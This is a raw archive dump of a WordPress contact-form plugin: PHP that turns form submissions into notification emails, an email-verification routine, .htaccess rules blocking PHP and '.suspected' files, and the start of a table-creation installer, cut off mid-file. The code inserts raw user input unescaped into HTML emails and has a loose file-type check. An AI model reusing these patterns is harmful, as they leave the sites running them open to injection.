										$matrix .='<td style="text-align:center"><input  type="text" value="'.$checked.'" disabled /></td>';
								  
									  }
									  
									  }
									  else{
										foreach($column_ids as $column_id){
										 $checked = $_POST[$i."_select_yes_no".$id.$row_id.'_'.$column_id];
										   $matrix .='<td style="text-align:center">'.$checked.'</td>';
										
								
									  
										}
									  }
									  
									  }
									  
									  }
									  $matrix .='</tr>';
									  $k++;
									}
									 $matrix .='</table>';

						  
						  
						  
															
									if(isset($matrix))
									{
									  $new_value=$new_value.$matrix;					
									}
								  
									break;
								  }
					  default: break;
					}
					$new_script = str_replace("%".$label_each."%", $new_value, $new_script);
				  }
				}
			  }
			  if (strpos($new_script, "%all%") !== FALSE) {
				$new_script = str_replace("%all%", $list, $new_script);
			  }
			  $body = $new_script;
			  $send = wp_mail(str_replace(' ', '', $recipient), $subject, stripslashes($body), $headers, $attachment);
			}
		  }
		  if ($row->mail) {
			if ($send != TRUE) {
			  $_SESSION['error_or_no' . $id] = 1;
			  $msg = addslashes(__('Error, email was not sent.', 'form_maker'));
			}
			else {
			  $_SESSION['error_or_no' . $id] = 0;
			  $msg = addslashes(__('Your form was successfully submitted.', 'form_maker'));
			}
		  }
		  else {
			$_SESSION['error_or_no' . $id] = 0;
			$msg = addslashes(__('Your form was successfully submitted.', 'form_maker'));
		  }
		}
               
                // delete files from uploads (save_upload = 0)
                if($row->save_uploads == 0){
                    foreach ($all_files as &$all_file) {
                        if (file_exists(ABSPATH.'/'.$all_file['tmp_name'])) {
                            unlink(ABSPATH.'/'.$all_file['tmp_name']);
                        }
                    }
					
                }
		$https = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ? 'https://' : 'http://');
		switch ($row->submit_text_type) {
			case "2":
			case "5": {
				if ($row->submit_text_type != 4) {
				  $_SESSION['massage_after_submit' . $id] = $msg;
				}
				$_SESSION['form_submit_type' . $id] = $row->submit_text_type . "," . $row->id;
				if ($row->article_id) {
				  $redirect_url = $row->article_id;
				}
				else {
				  $redirect_url = $https . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
				}
				break;
			}
			case "3": {
				if ($row->submit_text_type != 4) {
				  $_SESSION['massage_after_submit' . $id] = $msg;
				}
				$_SESSION['form_submit_type' . $id] = $row->submit_text_type . "," . $row->id;
				$redirect_url = $https . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
				break;
			}
			case "4": {
				if ($row->submit_text_type != 4) {
				  $_SESSION['massage_after_submit' . $id] = $msg;
				}
				$_SESSION['form_submit_type' . $id] = $row->submit_text_type . "," . $row->id;
				$redirect_url = $row->url;
				break;
			}
			default: {
				if ($row->submit_text_type != 4) {
					$_SESSION['massage_after_submit' . $id] = $msg;
				}
				$_SESSION['form_submit_type' . $id] = $row->submit_text_type . "," . $row->id;
				$redirect_url = $https . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
				break;
			}
		}
		if (!$str) {
			wp_redirect($redirect_url);
			exit;
		}
		else {
			$_SESSION['redirect_paypal'.$id] = 1;
		  
			$str .= "&return=" . urlencode($redirect_url);
			wp_redirect($str);
			exit;
		}
	}

	public static function custom_fields_mail($type, $key, $id, $attachment, $form_currency)
	{
		$new_value ="";
		
		$disabled_fields	= explode(',', isset($_REQUEST["disabled_fields".$id]) ? $_REQUEST["disabled_fields".$id] : "");
		$disabled_fields 	= array_slice($disabled_fields,0, count($disabled_fields)-1);
    
    if($type!="type_submit_reset" or $type!="type_map" or $type!="type_editor" or  $type!="type_captcha" or $type != "type_arithmetic_captcha" or  $type!="type_recaptcha" or  $type!="type_button") {
      switch ($type) {
        case 'type_text':
        case 'type_password':
        case 'type_textarea':
        case "type_date":
        case "type_own_select":					
        case "type_country":				
        case "type_number": {
          $element = isset($_POST['wdform_'.$key."_element".$id]) ? $_POST['wdform_'.$key."_element".$id] : NULL;
          if(isset($element)) {
            $new_value = $element;					
          }
          break;
        }
        case "type_file_upload": {
          	if($attachment)
				foreach($attachment as $attachment_temp)
				{
					$uploadedFileNameParts = explode('.',$attachment_temp[1]);
					$uploadedFileExtension = array_pop($uploadedFileNameParts);
					
					$invalidFileExts = array('gif', 'jpg', 'jpeg', 'png', 'swf', 'psd', 'bmp', 'tiff', 'jpc', 'jp2', 'jpf', 'jb2', 'swc', 'aiff', 'wbmp', 'xbm' );
					$extOk = false;

					foreach($invalidFileExts as $key => $valuee)
					{
						if(is_numeric(strpos(strtolower($valuee), strtolower($uploadedFileExtension) )) )
							$extOk = true;
					}
					
					if ($extOk == true) 
						$new_value .= '<img src="'.site_url().'/'.$attachment_temp.'" alt="'.$attachment_temp[1].'"/>';
						
				}
			break;
        }
        case "type_hidden": {
          $element = isset($_POST[$element_label]) ? $_POST[$element_label] : NULL;
          if(isset($element)) {
            $new_value = $element;	
          }
          break;
        }
        case "type_mark_map": {
          $element = isset($_POST['wdform_'.$key."_long".$id]) ? $_POST['wdform_'.$key."_long".$id] : NULL;
          if(isset($element)) {
            $new_value = 'Longitude:' . $element . '<br/>Latitude:' . (isset($_POST['wdform_'.$key."_lat".$id]) ? $_POST['wdform_'.$key."_lat".$id] : "");
          }
          break;		
        }
        case "type_submitter_mail": {
          $element = isset($_POST['wdform_'.$key."_element".$id]) ? $_POST['wdform_'.$key."_element".$id] : NULL;
          if(isset($element)) {
            $new_value = $element;					
          }
          break;		
        }								
        case "type_time": {
          $hh = isset($_POST['wdform_'.$key."_hh".$id]) ? $_POST['wdform_'.$key."_hh".$id] : NULL;
          if(isset($hh)) {
            $ss = isset($_POST['wdform_'.$key."_ss".$id]) ? $_POST['wdform_'.$key."_ss".$id] : NULL;
            if(isset($ss)) {
              $new_value = $hh . ':' . (isset($_POST['wdform_'.$key."_mm".$id]) ? $_POST['wdform_'.$key."_mm".$id] : "") . ':' . $ss;
            }
            else {
              $new_value = $hh . ':' . (isset($_POST['wdform_'.$key."_mm".$id]) ? $_POST['wdform_'.$key."_mm".$id] : "");
            }
            $am_pm = isset($_POST['wdform_'.$key."_am_pm".$id]) ? $_POST['wdform_'.$key."_am_pm".$id] : NULL;
            if(isset($am_pm)) {
              $new_value = $new_value . ' ' . $am_pm;
            }
          }
          break;
        }
        
        case "type_phone": {
          $element_first = isset($_POST['wdform_'.$key."_element_first".$id]) ? $_POST['wdform_'.$key."_element_first".$id] : NULL;
          if(isset($element_first)) {
              $new_value = $element_first . ' ' . (isset($_POST['wdform_'.$key."_element_last".$id]) ? $_POST['wdform_'.$key."_element_last".$id] : "");
          }	
          break;
        }								
        case "type_name": {
          $element_first = isset($_POST['wdform_'.$key."_element_first".$id]) ? $_POST['wdform_'.$key."_element_first".$id] : NULL;
          if(isset($element_first)) {
            $element_title = isset($_POST['wdform_'.$key."_element_title".$id]) ? $_POST['wdform_'.$key."_element_title".$id] : NULL;
            if(isset($element_title)) {
              $new_value = $element_title . ' ' . $element_first . ' ' . (isset($_POST['wdform_'.$key."_element_last".$id]) ? $_POST['wdform_'.$key."_element_last".$id] : "") . ' ' . (isset($_POST['wdform_'.$key."_element_middle".$id]) ? $_POST['wdform_'.$key."_element_middle".$id] : "");
            }
            else {
              $new_value = $element_first . ' ' . (isset($_POST['wdform_'.$key."_element_last".$id]) ? $_POST['wdform_'.$key."_element_last".$id] : "");
            }
          }	   
          break;		
        }								
        case "type_address": {
          $street1 = isset($_POST['wdform_'.$key."_street1".$id]) ? $_POST['wdform_'.$key."_street1".$id] : NULL;
          if(isset($street1)) {
            $new_value = $street1;
            break;
          }                  
          $street2 = isset($_POST['wdform_'.$key."_street2".$id]) ? $_POST['wdform_'.$key."_street2".$id] : NULL;
          if(isset($street2)) {
            $new_value = $street2;
            break;
          }
          $city = isset($_POST['wdform_'.$key."_city".$id]) ? $_POST['wdform_'.$key."_city".$id] : NULL;
          if(isset($city)) {
            $new_value = $city;
            break;
          }                  
          $state = isset($_POST['wdform_'.$key."_state".$id]) ? $_POST['wdform_'.$key."_state".$id] : NULL;
          if(isset($state)) {
            $new_value = $state;
            break;
          }
          $postal = isset($_POST['wdform_'.$key."_postal".$id]) ? $_POST['wdform_'.$key."_postal".$id] : NULL;
          if(isset($postal)) {
            $new_value = $postal;
            break;
          }
          $country = isset($_POST['wdform_'.$key."_country".$id]) ? $_POST['wdform_'.$key."_country".$id] : NULL;
          if(isset($country)) {
            $new_value = $country;
            break;
          }
          break;
        }
        case "type_date_fields": {
          $day = isset($_POST['wdform_'.$key."_day".$id]) ? $_POST['wdform_'.$key."_day".$id] : NULL;
          if(isset($day)) {
            $new_value = $day . '-' . (isset($_POST['wdform_'.$key."_month".$id]) ? $_POST['wdform_'.$key."_month".$id] : "") . '-' . (isset($_POST['wdform_'.$key."_year".$id]) ? $_POST['wdform_'.$key."_year".$id] : "");
          }
          break;
        }
        
        case "type_radio": {
          $element = isset($_POST['wdform_'.$key."_other_input".$id]) ? $_POST['wdform_'.$key."_other_input".$id] : NULL;
          if(isset($element)) {
            $new_value = $element;
            break;
          }									
          $element = isset($_POST['wdform_'.$key."_element".$id]) ? $_POST['wdform_'.$key."_element".$id] : NULL;
          if(isset($element)) {
            $new_value = $element;					
          }
          break;	
        }								
        case "type_checkbox": {
          $start = -1;
          for($j = 0; $j < 100; $j++) {
            $element = isset($_POST['wdform_'.$key."_element".$id.$j]) ? $_POST['wdform_'.$key."_element".$id.$j] : NULL;
            if(isset($element)) {
              $start = $j;
              break;
            }
          }									
          $other_element_id = -1;
          $is_other = isset($_POST['wdform_'.$key."_allow_other".$id]) ? $_POST['wdform_'.$key."_allow_other".$id] : "";
          if($is_other == "yes") {
            $other_element_id = isset($_POST['wdform_'.$key."_allow_other_num".$id]) ? $_POST['wdform_'.$key."_allow_other_num".$id] : "";
          }
          if($start != -1) {
            for($j = $start; $j < 100; $j++) {											
              $element = isset($_POST['wdform_'.$key."_element".$id.$j]) ? $_POST['wdform_'.$key."_element".$id.$j] : NULL;
              if(isset($element)) {
                if($j == $other_element_id) {
                  $new_value = $new_value . (isset($_POST['wdform_'.$key."_other_input".$id]) ? $_POST['wdform_'.$key."_other_input".$id] : "") . '<br>';
                }
                else {											
                  $new_value = $new_value . $element . '<br>';
                }
              }
            }										
          }
          break;
        }
        case "type_paypal_price": {		
          $new_value = 0;
          if(isset($_POST['wdform_'.$key."_element_dollars".$id])) {
            $new_value = $_POST['wdform_'.$key."_element_dollars".$id];
          }
          if(isset($_POST['wdform_'.$key."_element_cents".$id])) {
            $new_value = $new_value . '.' . $_POST['wdform_'.$key."_element_cents".$id];
          }
          $new_value = $new_value . $form_currency;
          break;
        }								
        case "type_paypal_select": {
          $new_value = (isset($_POST['wdform_'.$key."_element_label".$id]) ? $_POST['wdform_'.$key."_element_label".$id] : "") . ':' . (isset($_POST['wdform_'.$key."_element".$id]) ? $_POST['wdform_'.$key."_element".$id] : "") . $form_currency;
          $element_quantity_label = isset($_POST['wdform_'.$key."_element_quantity_label".$id]) ? $_POST['wdform_'.$key."_element_quantity_label".$id] : NULL;
          $element_quantity = (isset($_POST['wdform_'.$key."_element_quantity".$id]) && $_POST['wdform_'.$key."_element_quantity".$id]) ? $_POST['wdform_'.$key."_element_quantity".$id] : NULL;
          if (isset($element_quantity)) {
            $new_value .= '<br/>' . $element_quantity_label . ': ' . $element_quantity;
          }
          for($k = 0; $k < 50; $k++) {
            $temp_val = isset($_POST['wdform_'.$key."_property".$id.$k]) ? $_POST['wdform_'.$key."_property".$id.$k] : NULL;
            if(isset($temp_val)) {
              $new_value .= '<br/>' . (isset($_POST['wdform_'.$key."_element_property_label".$id.$k]) ? $_POST['wdform_'.$key."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
            }
          }
          break;
        }								
        case "type_paypal_radio": {
          $new_value = (isset($_POST['wdform_'.$key."_element_label".$id]) ? $_POST['wdform_'.$key."_element_label".$id] : "") . ' - ' . (isset($_POST['wdform_'.$key."_element".$id]) ? $_POST['wdform_'.$key."_element".$id] : "") . $form_currency;									
          $element_quantity_label = isset($_POST['wdform_'.$key."_element_quantity_label".$id]) ? $_POST['wdform_'.$key."_element_quantity_label".$id] : NULL;
          $element_quantity = (isset($_POST['wdform_'.$i."_element_quantity".$id]) && $_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL;
          if (isset($element_quantity)) {
            $new_value .= '<br/>' . $element_quantity_label . ': ' . $element_quantity;
          }
          for($k = 0; $k < 50; $k++) {
            $temp_val = isset($_POST['wdform_'.$key."_property".$id.$k]) ? $_POST['wdform_'.$key."_property".$id.$k] : NULL;
            if(isset($temp_val)) {
              $new_value .= '<br/>' . (isset($_POST['wdform_'.$key."_element_property_label".$id.$k]) ? $_POST['wdform_'.$key."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
            }
          }							
          break;
        }
        case "type_paypal_shipping": {									
          $new_value = (isset($_POST['wdform_'.$key."_element_label".$id]) ? $_POST['wdform_'.$key."_element_label".$id] : "") . ' : ' . (isset($_POST['wdform_'.$key."_element".$id]) ? $_POST['wdform_'.$key."_element".$id] : "") . $form_currency;		
          break;
        }
        case "type_paypal_checkbox": {
          $start = -1;
          for($j = 0; $j < 100; $j++) {
            $element = isset($_POST['wdform_'.$key."_element".$id.$j]) ? $_POST['wdform_'.$key."_element".$id.$j] : NULL;
            if(isset($element)) {
              $start = $j;
              break;
            }
          }									
          if($start != -1) {
            for($j = $start; $j < 100; $j++) {											
              $element = isset($_POST['wdform_'.$key."_element".$id.$j]) ? $_POST['wdform_'.$key."_element".$id.$j] : NULL;
              if(isset($element)) {
                $new_value = $new_value . (isset($_POST['wdform_'.$key."_element".$id.$j."_label"]) ? $_POST['wdform_'.$key."_element".$id.$j."_label"] : "") . ' - ' . ($element == '' ? '0' . $form_currency : $element) . $form_currency . '<br>';
              }
            }
          }									
          $element_quantity_label = isset($_POST['wdform_'.$key."_element_quantity_label".$id]) ? $_POST['wdform_'.$key."_element_quantity_label".$id] : NULL;
          $element_quantity = (isset($_POST['wdform_'.$key."_element_quantity".$id]) && $_POST['wdform_'.$key."_element_quantity".$id]) ? $_POST['wdform_'.$key."_element_quantity".$id] : NULL;
          if (isset($element_quantity)) {
            $new_value .= '<br/>' . $element_quantity_label . ': ' . $element_quantity;
          }
          for($k = 0; $k < 50; $k++) {
            $temp_val = isset($_POST['wdform_'.$key."_property".$id.$k]) ? $_POST['wdform_'.$key."_property".$id.$k] : NULL;
            if(isset($temp_val)) {
              $new_value .= '<br/>' . (isset($_POST['wdform_'.$key."_element_property_label".$id.$k]) ? $_POST['wdform_'.$key."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
            }
          }									
          break;
        }								
        case "type_paypal_total": {
          $element = isset($_POST['wdform_'.$key."_paypal_total".$id]) ? $_POST['wdform_'.$key."_paypal_total".$id] : "";
          $new_value = $new_value . $element;
          break;
        }
        case "type_star_rating": {
          $element = isset($_POST['wdform_'.$key."_star_amount".$id]) ? $_POST['wdform_'.$key."_star_amount".$id] : NULL;
          $selected = isset($_POST['wdform_'.$key."_selected_star_amount".$id]) ? $_POST['wdform_'.$key."_selected_star_amount".$id] : 0;									
          if(isset($element)) {
            $new_value = $new_value . $selected . '/' . $element;					
          }
          break;
        }
        case "type_scale_rating": {
          $element = isset($_POST['wdform_'.$key."_scale_amount".$id]) ? $_POST['wdform_'.$key."_scale_amount".$id] : NULL;
          $selected = isset($_POST['wdform_'.$key."_scale_radio".$id]) ? $_POST['wdform_'.$key."_scale_radio".$id] : 0;
          if(isset($element)) {
            $new_value = $new_value . $selected . '/' . $element;					
          }
          break;
        }								
        case "type_spinner": {
          $element = isset($_POST['wdform_'.$key."_element".$id]) ? $_POST['wdform_'.$key."_element".$id] : NULL;
          if(isset($element)) {
            $new_value = $new_value . $element;					
          }
          break;
        }								
        case "type_slider": {
          $element = isset($_POST['wdform_'.$key."_slider_value".$id]) ? $_POST['wdform_'.$key."_slider_value".$id] : NULL;
          if(isset($element)) {
            $new_value = $new_value . $element;					
          }
          break;
        }
        case "type_range": {
          $element0 = isset($_POST['wdform_'.$key."_element".$id.'0']) ? $_POST['wdform_'.$key."_element".$id.'0'] : NULL;
          $element1 = isset($_POST['wdform_'.$key."_element".$id.'1']) ? $_POST['wdform_'.$key."_element".$id.'1'] : NULL;
          if(isset($element0) || isset($element1)) {
            $new_value = $new_value . $element0 . '-' . $element1;					
          }
          break;
        }								
        case "type_grading": {
          $element = isset($_POST['wdform_'.$key."_hidden_item".$id]) ? $_POST['wdform_'.$key."_hidden_item".$id] : "";
          $grading = explode(":", $element);
          $items_count = sizeof($grading) - 1;									
          $element = "";
          $total = "";									
          for($k = 0;$k < $items_count; $k++) {
            $element .= $grading[$k] . ":" . (isset($_POST['wdform_'.$key."_element".$id.'_'.$k]) ? $_POST['wdform_'.$key."_element".$id.'_'.$k] : "") . " ";
            $total += (isset($_POST['wdform_'.$key."_element".$id.'_'.$k]) ? $_POST['wdform_'.$key."_element".$id.'_'.$k] : 0);
          }
          $element .="Total:" . $total;
          if(isset($element)) {
            $new_value = $new_value . $element;
          }
          break;
        }						
        case "type_matrix": {
          $input_type = isset($_POST['wdform_'.$key."_input_type".$id]) ? $_POST['wdform_'.$key."_input_type".$id] : "";
          $mat_rows = explode("***", isset($_POST['wdform_'.$key."_hidden_row".$id]) ? $_POST['wdform_'.$key."_hidden_row".$id] : "");
          $rows_count = sizeof($mat_rows) - 1;
          $mat_columns = explode("***", isset($_POST['wdform_'.$key."_hidden_column".$id]) ? $_POST['wdform_'.$key."_hidden_column".$id] : "");
          $columns_count = sizeof($mat_columns) - 1;												
          $matrix="<table>";												
          $matrix .='<tr><td></td>';
          for( $k=1;$k< count($mat_columns) ;$k++) {
            $matrix .= '<td style="background-color:#BBBBBB; padding:5px; ">' . $mat_columns[$k] . '</td>';
          }
          $matrix .= '</tr>';										
          $aaa=Array();										
            for($k=1; $k<=$rows_count; $k++) {
              $matrix .= '<tr><td style="background-color:#BBBBBB; padding:5px;">' . $mat_rows[$k] . '</td>';										
              if($input_type=="radio") {
                $mat_radio = isset($_POST['wdform_'.$key."_input_element".$id.$k]) ? $_POST['wdform_'.$key."_input_element".$id.$k] : 0;											
                if($mat_radio == 0) {
                  $checked = "";
                  $aaa[1] = "";
                }
                else {
                  $aaa = explode("_", $mat_radio);
                }
                
                for($j = 1; $j <= $columns_count; $j++) {
                  if($aaa[1]==$j) {
                    $checked="checked";
                  }
                  else {
                    $checked="";
                  }
                  $matrix .= '<td style="text-align:center"><input  type="radio" ' . $checked . ' disabled /></td>';												
                }
              }
              else {
                if($input_type == "checkbox") {                
                  for($j = 1; $j <= $columns_count; $j++) {
                    $checked = isset($_POST['wdform_'.$key."_input_element".$id.$k.'_'.$j]) ? $_POST['wdform_'.$key."_input_element".$id.$k.'_'.$j] : 0;
                    if($checked==1) {
                      $checked = "checked";				
                    }
                    else {
                      $checked = "";
                    }
                    $matrix .= '<td style="text-align:center"><input  type="checkbox" ' . $checked . ' disabled /></td>';												
                  }
                }
                else {
                  if($input_type == "text") {																			  
                    for($j = 1; $j <= $columns_count; $j++) {
                      $checked = isset($_POST['wdform_'.$key."_input_element".$id.$k.'_'.$j]) ? $_POST['wdform_'.$key."_input_element".$id.$k.'_'.$j] : "";
                      $matrix .= '<td style="text-align:center"><input  type="text" value="' . $checked . '" disabled /></td>';											
                    }													
                  }
                  else {
                    for($j = 1; $j <= $columns_count; $j++) {
                      $checked = isset($_POST['wdform_'.$key."_select_yes_no".$id.$k.'_'.$j]) ? $_POST['wdform_'.$key."_select_yes_no".$id.$k.'_'.$j] : "";
                      $matrix .= '<td style="text-align:center">' . $checked . '</td>';
                    }
                  }
                }
              }
              $matrix .= '</tr>';
            }
            $matrix .= '</table>';
            if(isset($matrix)) {
              $new_value = $new_value . $matrix;
            }
          break;
        }
        default: break;
      }
      // $new_script = str_replace("%" . $label_each . "%", $new_value, $new_script);	
    }
    
    return $new_value;
  }

	public function empty_field($element, $mail_emptyfields) {		
		if(!$mail_emptyfields)
			if(empty($element))
				return 0;

		return 1;
	}
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}frontend/models/FMModelVerify_email_fmc.php000060400000011141152434416630015025 0ustar00<?php

class FMModelVerify_email_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  //////////////////////////////////////////////////////////////////////////////////////// 
  function setValidation($gid, $md5, $email) {
		global $wpdb;
		$query = $wpdb->prepare("SELECT * FROM ".$wpdb->prefix."formmaker_submits WHERE group_id='%d' AND element_label= 'verifyInfo' AND element_value REGEXP 'verified'", $gid);
		$verified_row = $wpdb->get_row($query);

		if($verified_row)
			$view = __('Your email address is already verified.', 'form_maker');
		else
		{
			$query = $wpdb->prepare("SELECT * FROM ".$wpdb->prefix."formmaker_submits WHERE group_id='%d' AND element_label REGEXP 'verifyInfo' AND element_value  NOT REGEXP 'verified'", $gid);
			$rows = $wpdb->get_results($query);

			if (!$rows)
				return false;
				
			$view = '';	
			foreach($rows as $row){
				$verifyInfo = explode('**',$row->element_value);
				$key = $verifyInfo[0];
				$expHour = $verifyInfo[1];
				$recipiend = $verifyInfo[2];
			
				if($recipiend == $email) {
					$date = strtotime($row->date);
					if($key === $md5){
						if($expHour > 0){					
							$now = time();
							$hourInterval  = floor(($now - $date)/3600); //return hour
							if ($hourInterval <= $expHour) {
								$wpdb->update( 
									$wpdb->prefix."formmaker_submits",
									array( 
										'element_value' => 'verified**'.$recipiend,
										'element_label' => 'verifyInfo'
									), 
									array( 
										'group_id' => $gid ,
										'element_label' => 'verifyInfo@'.$recipiend
									), 
									array( 
										'%s',	
										'%s'
									), 
									array( '%d', 
										'%s'
									) 
								);
								$view = __('Your email has been successfully verified.', 'form_maker');
							}
							else							
								$view = __('Your email verification has timed out.', 'form_maker'); // 0 = time expired
								
						}
						else
						{
							$wpdb->update( 
								$wpdb->prefix."formmaker_submits",
								array( 
									'element_value' => 'verified**'.$recipiend,
									'element_label' => 'verifyInfo'
								), 
								array( 
									'group_id' => $gid ,
									'element_label' => 'verifyInfo@'.$recipiend
								), 
								array( 
									'%s',	
									'%s'
								), 
								array( '%d', 
									'%s'
								) 
							);
							$view = __('Your email has been successfully verified.', 'form_maker');
							
						}
					}
					else
						$view = __('Verification link is invalid.', 'form_maker'); //wrong code
						
					break;	
				}	
				else
					continue;
			}
		}
		return $view;
	}
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}frontend/.htaccess000044400000000424152434416630010167 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>.htaccess000044400000000424152434416630006350 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>contact_form_maker_insert.php000060400002507474152434416630012525 0ustar00<?php

function contact_from_maker_insert() {
  global $wpdb;
  $formmaker = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `title` varchar(127) NOT NULL,
    `mail` varchar(128) NOT NULL,
    `form_front` longtext NOT NULL,
    `theme` int(11) NOT NULL,
    `javascript` text NOT NULL,
    `submit_text` longtext NOT NULL,
    `url` varchar(200) NOT NULL,
    `submit_text_type` tinyint(4) NOT NULL,
    `script_mail` text NOT NULL,
    `script_mail_user` text NOT NULL,
    `counter` int(11) NOT NULL,
    `published` int(11) NOT NULL DEFAULT '1',
    `label_order` text NOT NULL,
    `label_order_current` text NOT NULL,
    `article_id` varchar(500) NOT NULL,
    `pagination` varchar(128) NOT NULL,
    `show_title` varchar(128) NOT NULL,
    `show_numbers` varchar(128) NOT NULL,
    `public_key` varchar(50) NOT NULL,
    `private_key` varchar(50) NOT NULL,
    `recaptcha_theme` varchar(20) NOT NULL,
    `paypal_mode` int(2) NOT NULL,
    `checkout_mode` varchar(20) NOT NULL,
    `paypal_email` varchar(50) NOT NULL,
    `payment_currency` varchar(20) NOT NULL,
    `tax` float NOT NULL,
    `form_fields` text NOT NULL,
    `savedb` tinyint(4) NOT NULL DEFAULT '1',
    `sendemail` tinyint(4) NOT NULL DEFAULT '1',
    `requiredmark` varchar(20) NOT NULL DEFAULT '*',
    `from_mail` varchar(128) NOT NULL,
    `from_name` varchar(128) NOT NULL,
    `reply_to` varchar(128) NOT NULL,
    `send_to` varchar(128) NOT NULL,
    `autogen_layout` tinyint(4) NOT NULL DEFAULT '1',
    `custom_front` longtext NOT NULL,
    `mail_from_user` varchar(128) NOT NULL,
    `mail_from_name_user` varchar(128) NOT NULL,
    `reply_to_user` varchar(128) NOT NULL,
    `condition` text NOT NULL,
    `mail_cc` varchar(128) NOT NULL,
    `mail_cc_user` varchar(128) NOT NULL,
    `mail_bcc` varchar(128) NOT NULL,
    `mail_bcc_user` varchar(128) NOT NULL,
    `mail_subject` varchar(128) NOT NULL,
    `mail_subject_user` varchar(128) NOT NULL,
    `mail_mode` tinyint(4) NOT NULL DEFAULT '1',
    `mail_mode_user` tinyint(4) NOT NULL DEFAULT '1',
    `mail_attachment` tinyint(4) NOT NULL DEFAULT '1',
    `mail_attachment_user` tinyint(4) NOT NULL DEFAULT '1',
    `user_id_wd` varchar(220) NOT NULL,
    `sortable` int(11) NOT NULL,
    `frontend_submit_fields` text NOT NULL,
    `frontend_submit_stat_fields` text NOT NULL,
	`mail_emptyfields` tinyint(4) NOT NULL DEFAULT '0',
	`mail_verify` tinyint(4) NOT NULL DEFAULT '0',
	`mail_verify_expiretime` float NOT NULL,
	`mail_verification_post_id` int(11) NOT NULL,
	`save_uploads` tinyint(4) NOT NULL DEFAULT '1',
    PRIMARY KEY (`id`)
  ) DEFAULT CHARSET=utf8;";
  $wpdb->query($formmaker);
  $plugin_path = WD_FMC_URL;
  install_demo_forms_fmc();
  $formmaker_submits = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_submits` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `form_id` int(11) NOT NULL,
    `element_label` varchar(128) NOT NULL,
    `element_value` varchar(600) NOT NULL,
    `group_id` int(11) NOT NULL,
    `date` datetime NOT NULL,
    `ip` varchar(32) NOT NULL,
    `user_id_wd` int(11) NOT NULL,
    PRIMARY KEY (`id`)
  ) DEFAULT CHARSET=utf8;";
  $wpdb->query($formmaker_submits);

  $formmaker_themes = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_themes` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `title` varchar(200) NOT NULL,
    `css` text NOT NULL,
    `default` tinyint(4) NOT NULL,
    PRIMARY KEY (`id`)
  ) DEFAULT CHARSET=utf8;";
  $wpdb->query($formmaker_themes);

  $formmaker_blocked = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_blocked` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `ip` varchar(128) NOT NULL,
    PRIMARY KEY (`id`)
  ) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1";
  $wpdb->query($formmaker_blocked);

  $form_maker_theme_row = $wpdb->get_var("SELECT * FROM " . $wpdb->prefix . "formmaker_themes");
  if (!$form_maker_theme_row) {
